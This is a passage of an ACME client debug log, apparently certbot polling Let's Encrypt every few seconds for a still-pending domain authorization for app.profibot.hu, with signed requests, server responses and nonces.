"https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:44,788:DEBUG:acme.client:Storing nonce: 82ktJIqYLhR4ETijKbmi7a_xx1V7NR1RtcareEIXVpqraZCdn_E +2026-01-20 19:14:44,789:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:47,790:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:47,794:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWUxoUjRFVGlqS2JtaTdhX3h4MVY3TlIxUnRjYXJlRUlYVnBxcmFaQ2RuX0UiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "Qd-HdDsnSFIIaxViaKfop2kZ0zkwGo8qRSa733sq47a0WImsF8UcNICymuJw0GAVntUnLYp9B_WGNNRVFvWv3WhR44RTuvGT91j4k8anWvIIkAT2AXtuG8MWRQLPwCpkQ5xqCrcTwf00Mp6vbUJixAS15Dn0-aJPRtXOF_ybh2jCeRe4DO-tuqs9cjfrIQBRqbdfcO8uCgjadR6cqErNDMuHcevcdi2limUFuFNa9wAtiJ6QKegEQxzHaXJ8UPVb8UHHoHiUXNosPlpXK2kils8CoBTj5_v5XBTif2hzmXQc18T5zgZfbaQNPyhPOf3SDUvkTAzwx6aMh-sVTtNUew", + "payload": "" +} +2026-01-20 19:14:47,950:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:47,951:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:47 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: l5FKN_ymiG212fdEAJWJ9MykJ5cRW3Lwb1IH4L3kV8qwDkeGag8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:47,951:DEBUG:acme.client:Storing nonce: l5FKN_ymiG212fdEAJWJ9MykJ5cRW3Lwb1IH4L3kV8qwDkeGag8 +2026-01-20 19:14:47,952:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:50,953:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:50,957:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bWlHMjEyZmRFQUpXSjlNeWtKNWNSVzNMd2IxSUg0TDNrVjhxd0RrZUdhZzgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "GV2Luedeu2jlFpfv6ej9iVw_091SZGe80P3h0Xif9tp6ShsS_99kwdhjkodXYLsLxbLT1bQPBm9FLlgJdKlB5_qIsc4Qo6a-RoWxxauMCR9v4huFTgosGINTrbXqieEdd_XGVyICbL1fuRLQLKfk2LpqbhZdI-tnFIXf4cZPhD81IFoCM6Ot5KmR2xm4KhIM0IyrvEy8ph2K9s_d4w_yfFrh1GnLvtA-VrNszba23aXSqOTKoSicpOSGH5KNAI-a0D07vjiDo8wlTPqerRGMJKfScP5yXq6jr8yyeFWGc7pKB0D66zaXHhtkjttIQYERQA9apidm-C_ScgpNB50VNA", + "payload": "" +} +2026-01-20 19:14:51,114:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:51,115:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:51 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: l5FKN_ymHAKCK0oFJQI5Sg_2lasIAQyIInSEVka2yL1lSZGnx6k +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:51,115:DEBUG:acme.client:Storing nonce: l5FKN_ymHAKCK0oFJQI5Sg_2lasIAQyIInSEVka2yL1lSZGnx6k +2026-01-20 19:14:51,116:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:54,117:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:54,121:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bUhBS0NLMG9GSlFJNVNnXzJsYXNJQVF5SUluU0VWa2EyeUwxbFNaR254NmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "jr9GFN5g8CMSaHok6UKhThEZpfpnb68MtFhpc7FISzaQPviJHtJ4AkyrHBHcO4pY4gzrGe3cGtjE2v-bgisZMDrtM9Maq5IS8a-8hpM2yrLfR9ZzupOqIZ1VwgyuHcK-bJp283HtZBdEa-XzVNNk-xbcIiaBaSoWlQmJN-UbQb2zJh0CY6IyVPqT7rWsxp60voKZjBgxpe9uWmQcIvfgGgaL7YCMhN0_H12QUxYBDG-T-1T4NWgowGJ0Kk6WrJx-cuu9cIVx0lWjH2tJO2NQ1QTVEHZKSGE135KZYvv1loihxl6SboHgZziJZ16jGFxiyMoBB5QeMHkObLr7kiSafA", + "payload": "" +} +2026-01-20 19:14:54,278:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:54,279:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:54 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqYUTmR7Ya9m7basL2vjOobuankEqj2Lo-L3b7H8lPiirY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:54,279:DEBUG:acme.client:Storing nonce: 82ktJIqYUTmR7Ya9m7basL2vjOobuankEqj2Lo-L3b7H8lPiirY +2026-01-20 19:14:54,280:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:57,281:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:57,285:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWVVUbVI3WWE5bTdiYXNMMnZqT29idWFua0VxajJMby1MM2I3SDhsUGlpclkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "iO4L5RxCQ6DHzKQ12ThfpabWVrUOAdRwKC0FQPv7jC9lZVWMFuCbwHl3Ey-RjEOKUiY7VxJkxOrHVTH8lLfTnWAOJxlJzG58spEHZT7XWscPFwBsD6M-CQq_dMARrzUzKYYGJswoAXr-F1bFg3F2Cqg6-Ce9IIMOi6GsXBuFvL3mPjnsn0hTgP8fch9KYWoAtQijGK6w8FQ6RQBPHRfARm5ewp2a9FtFzZ2Y2UBNhqkovWZ1-YYEbsDEDHn4n3wFISkAnYOQ2HfxeIi-htSZuJAz03kec2S6puA1LG1qgOeSOoAjQUTL1zE8_fyDf7-o9kgEaP8oeED6TSIJzN5Paw", + "payload": "" +} +2026-01-20 19:14:57,441:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:57,442:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:57 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqY0G0EZBzN7DPREfQXjfxS0Mc-Q_2DIapJ9FKh6ke6a2U +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:57,442:DEBUG:acme.client:Storing nonce: 82ktJIqY0G0EZBzN7DPREfQXjfxS0Mc-Q_2DIapJ9FKh6ke6a2U +2026-01-20 19:14:57,443:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:15:00,444:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:00,448:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWTBHMEVaQnpON0RQUkVmUVhqZnhTME1jLVFfMkRJYXBKOUZLaDZrZTZhMlUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "TqkREj6NU17T50OPPrhMHSBoe8mYEVTjLvdgV3aDurfgYBDoB9qohXeyAmLxCBORzvSmJA1kG6FWj6ThYRzneeNB9aoQ3sZ0YAu4Un1mHVTuQZDO6qZZ8JyNvDe9w-G16TSYjE-QzTWeO9cRhnYXIZyo9KHJ6Hn0Zdo7VyxW_zRx0UZyjKo_PMBeE5of6bSIxceVlCBeN0M5Vjz2dCkYq5Wf9HMoy6x9SvuOsnYMIxr8kGAJv2UqZvSSdR0SaiPQI15tJ1K2guZ-PD_nE59gZWdRiYWGjA62l5Q3ojR1-QZm7QYL4RyoJzAFmKVBq5WLGUh844dV9NnwRhA97zEY3Q", + "payload": "" +} +2026-01-20 19:15:01,058:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:15:01,059:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:00 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqYjEU8GO9_6oSjwVx21sXtk5ECupi9btt6xZUyNJnZF8c +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:15:01,060:DEBUG:acme.client:Storing nonce: 82ktJIqYjEU8GO9_6oSjwVx21sXtk5ECupi9btt6xZUyNJnZF8c +2026-01-20 19:15:01,060:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:15:04,061:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:04,065:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWWpFVThHTzlfNm9TandWeDIxc1h0azVFQ3VwaTlidHQ2eFpVeU5KblpGOGMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "OEjb1GajoS6ntZLHnjeL7ili09ibmA0bUnW8MIHga1qCDkkbrSDdS7D96d5Eo_YlsT4EkpdIXj6LKZXQJnndrl5ibh6PGdJ-vpYwwtJUjzJQEWFvuEcMxsBm_tXfg9QlXZoXqh9Oyf9a74_tDdOJaQjZfBOy7lnBXzWgT5cwmVvC7zNEuqnACfOslESRGSEljdHEI3342mwkwkMRZa4OASvqoEH2FWfZRVbEvqe9y3GnfUej2MDzRHajpvm-WYgyejZndaWDMkmp5_BnU766M7RdoywG5pAe0gdg0qvU--YYbkKOCSewmYCiF8_va01Cyuz6SUtFhpLG6Dp-JnGf7A", + "payload": "" +} +2026-01-20 19:15:04,222:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:15:04,223:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:04 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: l5FKN_ymr2yaOWp-c0Gb1IOWI7FCetUzt9hJwUUKE75YIM_dHBs +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:15:04,223:DEBUG:acme.client:Storing nonce: l5FKN_ymr2yaOWp-c0Gb1IOWI7FCetUzt9hJwUUKE75YIM_dHBs +2026-01-20 19:15:04,224:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:15:07,225:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:07,228:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bXIyeWFPV3AtYzBHYjFJT1dJN0ZDZXRVenQ5aEp3VVVLRTc1WUlNX2RIQnMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "S3TAgBMtPl2HwQpCt2cvT4jHtcoPczxJVYIxSyIrCHCODIlaqgVSUj5Bdim1cSzZmhgByV6WO72Jpd3467sqo8CisJk2CJyLrfX4eUbha5GaFR219zTgPadtINWm6-GMBUvgR87FrIo3uCoECBm8_zKSxMqETRHa9HzZJm2fz9tCiY3EJZcvotd5AHdnRY05sDfw_b8roK7gJiO2CgGNTYiKvb5IW3j-U1YHdkGgbYsA9pg7UyQYf-xb-q215IabhziQM7OLcbsMTUHIn8OP6hvw9PZaWdhS_6ly4pDIli-gKEARIYmTLak2EmhtbphT93AAfvpT-Vut-jTjXFockw", + "payload": "" +} +2026-01-20 19:15:07,385:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:15:07,386:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:07 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqY7e0ew27cSWOTXKb3qdf_ZalvL46d4brAuVMLJcz2Pcs +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:15:07,386:DEBUG:acme.client:Storing nonce: 82ktJIqY7e0ew27cSWOTXKb3qdf_ZalvL46d4brAuVMLJcz2Pcs +2026-01-20 19:15:07,387:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:15:10,388:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:10,391:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWTdlMGV3MjdjU1dPVFhLYjNxZGZfWmFsdkw0NmQ0YnJBdVZNTEpjejJQY3MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "TnBcUI5wlbxcftZ02ivDO2gcnb9ZxGPBQyZcaZN0-RrlV9LSouGX-PqpSwjNX7Ak5rCRTU-NFZMSiZ2YlIuga5FdTlY95Ua1Cag2dNyT1zJycRypKO7o2EhzHOS6WbtnIeuVSaRvmd92ea5tXvkN0zEmXtZYUb2pjHTCncwrhdHydRL7ZPb_-AP_JrofygEJd00ZMFT-XAgSYcyv31gXRpZqLXyGNAAblxkGDZuEMbHZNdY5Wgb4u4hDFBQlXqlobpNhR31vACN_etMQmyOVCB1qOti6PhbtMyqdmjyiLCvysMcgFf6sIzJKhAo9hqqyRAKzRCehvqIRuVWluCdwWw", + "payload": "" +} +2026-01-20 19:15:10,549:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:15:10,550:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:15:10 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: l5FKN_ymY5H6jDrPPxeocyUWPFtFXgR-ZOgu2uH02VB9jLJHdbI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:15:10,550:DEBUG:acme.client:Storing nonce: l5FKN_ymY5H6jDrPPxeocyUWPFtFXgR-ZOgu2uH02VB9jLJHdbI +2026-01-20 19:15:10,551:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:15:13,552:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:15:13,556:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": 